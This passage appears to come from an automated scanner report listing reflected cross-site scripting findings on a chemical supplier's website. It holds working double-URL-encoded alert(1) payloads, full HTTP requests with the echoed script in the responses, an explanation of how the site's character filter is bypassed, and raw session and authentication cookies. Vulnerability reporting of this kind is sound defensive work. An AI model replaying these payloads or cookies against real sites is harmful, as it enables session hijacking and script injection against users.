Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:00 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/5adfd";alert(1)//6b84be9a72b","E404") ;
   </script>
...[SNIP]...

1.4. http://www.sigmaaldrich.com/analytical-chromatography/analytical-chromatography-catalog.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-chromatography-catalog.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 111e8%2522%253balert%25281%2529%252f%252fbadc87d23d9 was submitted in the REST URL parameter 1. This input was echoed as 111e8";alert(1)//badc87d23d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography111e8%2522%253balert%25281%2529%252f%252fbadc87d23d9/analytical-chromatography-catalog.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography111e8";alert(1)//badc87d23d9/analytical-chromatography-catalog.html","E404") ;
   </script>
...[SNIP]...

1.5. http://www.sigmaaldrich.com/analytical-chromatography/analytical-chromatography-catalog.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-chromatography-catalog.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74355%2522%253balert%25281%2529%252f%252f989934dd0d8 was submitted in the REST URL parameter 2. This input was echoed as 74355";alert(1)//989934dd0d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/74355%2522%253balert%25281%2529%252f%252f989934dd0d8 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:55 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/74355";alert(1)//989934dd0d8","E404") ;
   </script>
...[SNIP]...

1.6. http://www.sigmaaldrich.com/analytical-chromatography/analytical-reagents.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-reagents.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a9a%2522%253balert%25281%2529%252f%252fad9658751f was submitted in the REST URL parameter 1. This input was echoed as 25a9a";alert(1)//ad9658751f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography25a9a%2522%253balert%25281%2529%252f%252fad9658751f/analytical-reagents.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography25a9a";alert(1)//ad9658751f/analytical-reagents.html","E404") ;
   </script>
...[SNIP]...

1.7. http://www.sigmaaldrich.com/analytical-chromatography/analytical-reagents.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-reagents.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a213b%2522%253balert%25281%2529%252f%252fd062356e941 was submitted in the REST URL parameter 2. This input was echoed as a213b";alert(1)//d062356e941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/a213b%2522%253balert%25281%2529%252f%252fd062356e941 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/a213b";alert(1)//d062356e941","E404") ;
   </script>
...[SNIP]...

1.8. http://www.sigmaaldrich.com/analytical-chromatography/analytical-standards.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-standards.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b7f8%2522%253balert%25281%2529%252f%252f9bb4c219a53 was submitted in the REST URL parameter 1. This input was echoed as 5b7f8";alert(1)//9bb4c219a53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography5b7f8%2522%253balert%25281%2529%252f%252f9bb4c219a53/analytical-standards.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:00 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography5b7f8";alert(1)//9bb4c219a53/analytical-standards.html","E404") ;
   </script>
...[SNIP]...

1.9. http://www.sigmaaldrich.com/analytical-chromatography/analytical-standards.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-standards.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63839%2522%253balert%25281%2529%252f%252f742f80ae9ee was submitted in the REST URL parameter 2. This input was echoed as 63839";alert(1)//742f80ae9ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/63839%2522%253balert%25281%2529%252f%252f742f80ae9ee HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/63839";alert(1)//742f80ae9ee","E404") ;
   </script>
...[SNIP]...

1.10. http://www.sigmaaldrich.com/analytical-chromatography/catalog-request-form.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/catalog-request-form.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf604%2522%253balert%25281%2529%252f%252fe8aa16b1a71 was submitted in the REST URL parameter 1. This input was echoed as bf604";alert(1)//e8aa16b1a71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatographybf604%2522%253balert%25281%2529%252f%252fe8aa16b1a71/catalog-request-form.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:17 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatographybf604";alert(1)//e8aa16b1a71/catalog-request-form.html","E404") ;
   </script>
...[SNIP]...

1.11. http://www.sigmaaldrich.com/analytical-chromatography/catalog-request-form.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/catalog-request-form.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9aaca%2522%253balert%25281%2529%252f%252f8253fe91f2f was submitted in the REST URL parameter 2. This input was echoed as 9aaca";alert(1)//8253fe91f2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/9aaca%2522%253balert%25281%2529%252f%252f8253fe91f2f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:19 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/9aaca";alert(1)//8253fe91f2f","E404") ;
   </script>
...[SNIP]...

1.12. http://www.sigmaaldrich.com/analytical-chromatography/fluka-analytical/customware-oem.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/fluka-analytical/customware-oem.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b3d7%2522%253balert%25281%2529%252f%252f0b4b8116511 was submitted in the REST URL parameter 1. This input was echoed as 2b3d7";alert(1)//0b4b8116511 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography2b3d7%2522%253balert%25281%2529%252f%252f0b4b8116511/fluka-analytical/customware-oem.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; 